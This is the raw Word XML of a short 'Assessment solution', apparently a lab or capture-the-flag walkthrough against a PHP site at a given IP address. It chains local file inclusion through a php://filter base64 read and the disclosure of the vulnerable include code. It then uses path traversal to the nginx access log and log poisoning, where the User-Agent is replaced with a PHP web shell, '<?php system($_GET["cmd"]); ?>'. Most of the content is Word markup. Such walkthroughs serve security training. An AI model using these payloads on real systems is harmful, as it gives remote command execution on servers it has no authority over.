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16548" w14:textId="0E7934A8" w:rsidR="006B7632" w:rsidRDefault="008C3035" w:rsidP="008C3035">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C3035">
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Assessment solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE5CDCC" w14:textId="6446C1C1" w:rsidR="008C3035" w:rsidRDefault="008C3035" w:rsidP="008C3035">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73505F62" w14:textId="715B19F3" w:rsidR="008C3035" w:rsidRPr="00D82181" w:rsidRDefault="00000000" w:rsidP="00D8218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hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00D82181" w:rsidRPr="00B36467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http://206.189.125.243:31286/index.php?page=php://filter/read=convert.base64-encode/resource=./index</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D68313A" w14:textId="32751E2A" w:rsidR="008C3035" w:rsidRPr="008C3035" w:rsidRDefault="008C3035" w:rsidP="00F87A00">
      <w:pPr>
        <w:spacing w:after="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>(Returns the Content of index.php in encoded in base64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51357D5F" w14:textId="77777777" w:rsidR="008C3035" w:rsidRPr="008C3035" w:rsidRDefault="008C3035" w:rsidP="008C3035">
      <w:p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</w:p>
    <w:p w14:paraId="6C84B585" w14:textId="77777777" w:rsidR="008C3035" w:rsidRPr="00D82181" w:rsidRDefault="008C3035" w:rsidP="00D82181">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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D82181">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Decode the Base64 to see the content of index.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3916F3" w14:textId="10287B41" w:rsidR="000E6CC9" w:rsidRDefault="000E6CC9" w:rsidP="000E6CC9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0E6CC9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1091E7A0" w14:textId="45922658" w:rsidR="000E6CC9" w:rsidRPr="000E6CC9" w:rsidRDefault="000E6CC9" w:rsidP="000E6CC9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="002060"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/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0E6CC9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>// echo '&lt;li&gt;&lt;a href="ilf_admin/index.php"&gt;Admin&lt;/a&gt;&lt;/li&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1796BB" w14:textId="07D22630" w:rsidR="008C3035" w:rsidRDefault="000E6CC9" w:rsidP="000E6CC9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0E6CC9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442D63A3" w14:textId="1C544DA4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7FFE4904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>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59440A6C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>if(!isset($_GET['page'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2250C7B3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include "main.php";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1009D82D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64B6E806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>else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F0186D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$page = $_GET['page'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E5FD2B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if (strpos($page, "..") !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022E1FDC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  include "error.php";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E88E81B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253D1B98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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34586126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  include $page . ".php";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D93BADB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 xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67744B68" w14:textId="77777777" w:rsidR="008C3035" w:rsidRPr="008C3035" w:rsidRDefault="008C3035" w:rsidP="008C3035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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489A97BD" w14:textId="63BA512D" w:rsidR="00D82181" w:rsidRDefault="008C3035" w:rsidP="00D82181">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="002060"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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</w:r>
      <w:r w:rsidRPr="008C3035">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC91478" w14:textId="4FF3F9EF" w:rsidR="00D82181" w:rsidRDefault="00000000" w:rsidP="00F87A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="935"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00D82181" w:rsidRPr="00B36467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http://206.189.125.243:31286/index.php?page=ilf_admin/index</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D82181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F87A00">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC81A44" w14:textId="3CD48652" w:rsidR="00F87A00" w:rsidRDefault="00F87A00" w:rsidP="00F87A00">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="935"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F87A00">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Returns the content of the Admin Page)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4031DB38" w14:textId="70A24103" w:rsidR="00CB7498" w:rsidRDefault="00CB7498" w:rsidP="00CB7498">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="935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Now you got a new Parameter Field (?log=chat.log / http.log / system.log)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA50355" w14:textId="5CAA1D59" w:rsidR="00F25D1D" w:rsidRDefault="00000000" w:rsidP="00CB7498">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="935"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="003C3DBA" w:rsidRPr="00B36467">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://206.189.125.243:31286/ilf_admin/index.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003C3DBA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35D36">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Admin Panel Page)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0534D892" w14:textId="63CE2285" w:rsidR="00A1108B" w:rsidRDefault="000223C1" w:rsidP="00CB7498">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="935"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D97EC9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://206.189.125.243:31369/ilf_admin/index.php?log=../../../../../../../../../../../var/log/nginx/access.log</w:t>
      </w:r>
      <w:r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</w:p>
    <w:p w14:paraId="7E6AD40C" w14:textId="28F769DB" w:rsidR="00A1108B" w:rsidRDefault="00A1108B" w:rsidP="00CB7498">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="935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Use BurpSuite to preform a Server Log Poisoning Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A4B101" w14:textId="44B54EC3" w:rsidR="00D97EC9" w:rsidRPr="00CB7498" w:rsidRDefault="00D97EC9" w:rsidP="00CB7498">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="935"/>
        </w:tabs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Replace The User-agent with: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D97EC9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;?php system($_GET["cmd"]); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D97EC9" w:rsidRPr="00CB7498" w:rsidSect="008C3035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tellar">
    <w:altName w:val="Castellar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2B4658"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E1F65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99283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CF8"/>
    <w:rsid w:val="000223C1"/>
    <w:rsid w:val="000E6CC9"/>
    <w:rsid w:val="00166CF8"/>
    <w:rsid w:val="003C3DBA"/>
    <w:rsid w:val="00421CA3"/>
    <w:rsid w:val="00635D36"/>
    <w:rsid w:val="006B7632"/>
    <w:rsid w:val="008C3035"/>
    <w:rsid w:val="00A1108B"/>
    <w:rsid w:val="00CB7498"/>
    <w:rsid w:val="00D82181"/>
    <w:rsid w:val="00D97EC9"/>
    <w:rsid w:val="00F25D1D"/>
    <w:rsid w:val="00F87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6202"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4762DF4C-FA1B-4068-8D47-A2634696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21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1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1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223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206.189.125.243:31286/ilf_admin/index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6.189.125.243:31286/index.php?page=ilf_admin/index" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://206.189.125.243:31286/index.php?page=php://filter/read=convert.base64-encode/resource=./index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193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مايكل مدحت منير لوكا</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>مايكل مدحت منير لوكا</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-12T08:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-12T09:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>